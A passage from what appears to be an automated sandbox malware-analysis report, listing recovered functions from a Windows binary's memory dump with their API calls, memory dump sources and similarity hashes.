                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00142947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00142C05
                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 00142C87
                                                                                                                                                                                                                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00142C9D
                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00142CAE
                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00142CC0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$Delete$Copy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3226157194-0
                                                                                                                                                                                                                                          • Opcode ID: e1a7fbea31f31cba4360c72d776c5c13d50c53ad4f4e390c043ef224dc561f30
                                                                                                                                                                                                                                          • Instruction ID: bfbe17da7c65d1b3856332d95104b69c849336de247f82b3949cbb076a6fa56a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1a7fbea31f31cba4360c72d776c5c13d50c53ad4f4e390c043ef224dc561f30
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56B13E7190011DABDF25DBA4CC85EEEBB7DEF48350F5040A6FA09E7152EB309A848F61
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0015A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 0015A427
                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0015A435
                                                                                                                                                                                                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0015A468
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0015A63D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3488606520-0
                                                                                                                                                                                                                                          • Opcode ID: 481c5cd9331a4da692d1a02c7952d12c66770f1b30d0a3dfa7ff783917e19c75
                                                                                                                                                                                                                                          • Instruction ID: 1898507f1a3255609f7572c959355a792e4794a64597d567c3c55f2d35a2e695
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 481c5cd9331a4da692d1a02c7952d12c66770f1b30d0a3dfa7ff783917e19c75
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76A190B16043019FD720DF24C882F6AB7E1AF84714F54891DF9AA9B392D7B0EC45CB92
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0010BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00173700), ref: 0010BB91
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,001A121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0010BC09
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,001A1270,000000FF,?,0000003F,00000000,?), ref: 0010BC36
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0010BB7F
                                                                                                                                                                                                                                            • Part of subcall function 001029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0010D7D1,00000000,00000000,00000000,00000000,?,0010D7F8,00000000,00000007,00000000,?,0010DBF5,00000000), ref: 001029DE
                                                                                                                                                                                                                                            • Part of subcall function 001029C8: GetLastError.KERNEL32(00000000,?,0010D7D1,00000000,00000000,00000000,00000000,?,0010D7F8,00000000,00000007,00000000,?,0010DBF5,00000000,00000000), ref: 001029F0
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0010BD4B
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1286116820-0
                                                                                                                                                                                                                                          • Opcode ID: 3cbeb253b9012ee4d5a26c283c73266968ea81ac30559494ea5fd7d9af63e964
                                                                                                                                                                                                                                          • Instruction ID: cfb5c5a262975ee616a21850df9ef6877224c2a12335a0f368746f1545dfebc1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3cbeb253b9012ee4d5a26c283c73266968ea81ac30559494ea5fd7d9af63e964
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9510875908209AFDB14EF659DC1AAEB7B8FF51350F20426AE494D71D1EBB09E808B90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0013DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0013CF22,?), ref: 0013DDFD
                                                                                                                                                                                                                                            • Part of subcall function 0013DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0013CF22,?), ref: 0013DE16
                                                                                                                                                                                                                                            • Part of subcall function 0013E199: GetFileAttributesW.KERNEL32(?,0013CF95), ref: 0013E19A
                                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 0013E473
                                                                                                                                                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 0013E4AC
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0013E5EB
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0013E603
                                                                                                                                                                                                                                          • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0013E650
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3183298772-0
                                                                                                                                                                                                                                          • Opcode ID: 3395313833248da642bbfc27b8141c6f27d1917bca10a005418e5641d33fdb2f
                                                                                                                                                                                                                                          • Instruction ID: ff512a8058b0e95c1e62ae2fde4dfdf4ffbbad91629ce5a12bd9dbb189d099a3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3395313833248da642bbfc27b8141c6f27d1917bca10a005418e5641d33fdb2f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 875174B25083459BC724EB90DC81DEFB7ECAF95340F00491EF689D3192EF75A6888766
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0015B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
                                                                                                                                                                                                                                            • Part of subcall function 0015C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0015B6AE,?,?), ref: 0015C9B5
                                                                                                                                                                                                                                            • Part of subcall function 0015C998: _wcslen.LIBCMT ref: 0015C9F1
                                                                                                                                                                                                                                            • Part of subcall function 0015C998: _wcslen.LIBCMT ref: 0015CA68
                                                                                                                                                                                                                                            • Part of subcall function 0015C998: _wcslen.LIBCMT ref: 0015CA9E
                                                                                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0015BAA5
                                                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0015BB00
                                                                                                                                                                                                                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0015BB63
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?), ref: 0015BBA6
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0015BBB3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 826366716-0
                                                                                                                                                                                                                                          • Opcode ID: 7df6e3fc8985e988d1fff119ea5846b70a93ae38ce9739d4d4ed3ea8428a2ea7
                                                                                                                                                                                                                                          • Instruction ID: 19bb140a55200ab4262f30c9429f0afaa9322ebeda187c21bd3648ef0dc3baa8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7df6e3fc8985e988d1fff119ea5846b70a93ae38ce9739d4d4ed3ea8428a2ea7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E616A31208241EFD714DF14C890E6ABBE5FF84308F54855DF8A98B2A2DB71ED49CB92
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00138BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00138BCD
                                                                                                                                                                                                                                          • VariantClear.OLEAUT32 ref: 00138C3E
                                                                                                                                                                                                                                          • VariantClear.OLEAUT32 ref: 00138C9D
                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00138D10
                                                                                                                                                                                                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00138D3B
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4136290138-0
                                                                                                                                                                                                                                          • Opcode ID: b82fa4c456c675d7799d291645f4dbc15fe559014fbbebd1c9847e7d425154b6
                                                                                                                                                                                                                                          • Instruction ID: abaa6aed1d271f5fe5d93ab9ce860638f69981582254315ea1f86cecc5ceef39
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b82fa4c456c675d7799d291645f4dbc15fe559014fbbebd1c9847e7d425154b6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F15159B5A00219EFCB14CF68C894AAAB7F8FF89310F158559F905DB350EB30E911CBA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00148AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00148BAE
                                                                                                                                                                                                                                          • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00148BDA
                                                                                                                                                                                                                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00148C32
                                                                                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00148C57
                                                                                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00148C5F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2832842796-0
                                                                                                                                                                                                                                          • Opcode ID: e23761a8ff94020688d333c9524d82ac561703e2cc5520cb0cba1d1b8f22919d
                                                                                                                                                                                                                                          • Instruction ID: 9f92888c04d4e0aea911af9e59069e210debad24fad7d2679c213e83346561b2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e23761a8ff94020688d333c9524d82ac561703e2cc5520cb0cba1d1b8f22919d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62514835A00615AFCB04DF65C880AAEBBF5FF48314F088059E849AB362DB71ED41CBA1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00158EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00158F40
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00158FD0
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00158FEC
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00159032
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00159052
                                                                                                                                                                                                                                            • Part of subcall function 000EF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00141043,?,7529E610), ref: 000EF6E6
                                                                                                                                                                                                                                            • Part of subcall function 000EF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0012FA64,00000000,00000000,?,?,00141043,?,7529E610,?,0012FA64), ref: 000EF70D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 666041331-0
                                                                                                                                                                                                                                          • Opcode ID: b91c44029d8b71e9f04d5d0529bfb7e422b568f20034f0f90ba432d431be76ee
                                                                                                                                                                                                                                          • Instruction ID: 61ae7ba74eaebd74999ff466a863f3fc554146e864d053733dc98c15d59b1f61
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b91c44029d8b71e9f04d5d0529bfb7e422b568f20034f0f90ba432d431be76ee
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40513535600205DFCB04DF58C4948ADBBB1FF49325B4580AAE85AAF762DB31ED89CB91
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00166B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00166C33
                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000EC,?), ref: 00166C4A
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00166C73
                                                                                                                                                                                                                                          • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0014AB79,00000000,00000000), ref: 00166C98
                                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00166CC7
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$Long$MessageSendShow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3688381893-0
                                                                                                                                                                                                                                          • Opcode ID: 980a53dbca162bda1b5dfad74d25ccd46429e34abaf6af14eb5d316039d2f5e7
                                                                                                                                                                                                                                          • Instruction ID: c3f2d68af2ab79f2d225a088dd7add160504a7152219b6a9926282afa4b5c691
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 980a53dbca162bda1b5dfad74d25ccd46429e34abaf6af14eb5d316039d2f5e7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6341B435604504AFDB24CF28CC58FBA7BA5EB0A350F154268F899A73E0C371AD61DA90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00102051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                                                                                          • Opcode ID: 4a78a0c3407c58890c9c16fad4b1def822325ed29001be1a315fbd6eeab5d1a5
                                                                                                                                                                                                                                          • Instruction ID: 99d03fbf69ab24476dbe6128cc7be26d88ac4b654bc8f212bc2a192e93a8548b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a78a0c3407c58890c9c16fad4b1def822325ed29001be1a315fbd6eeab5d1a5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F541E236A002049FCB24DF78C884A6DB3F5EF89314F1545A9E655EB396DB71AD01CB80
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000E912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 000E9141
                                                                                                                                                                                                                                          • ScreenToClient.USER32(00000000,?), ref: 000E915E
                                                                                                                                                                                                                                          • GetAsyncKeyState.USER32(00000001), ref: 000E9183
                                                                                                                                                                                                                                          • GetAsyncKeyState.USER32(00000002), ref: 000E919D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4210589936-0
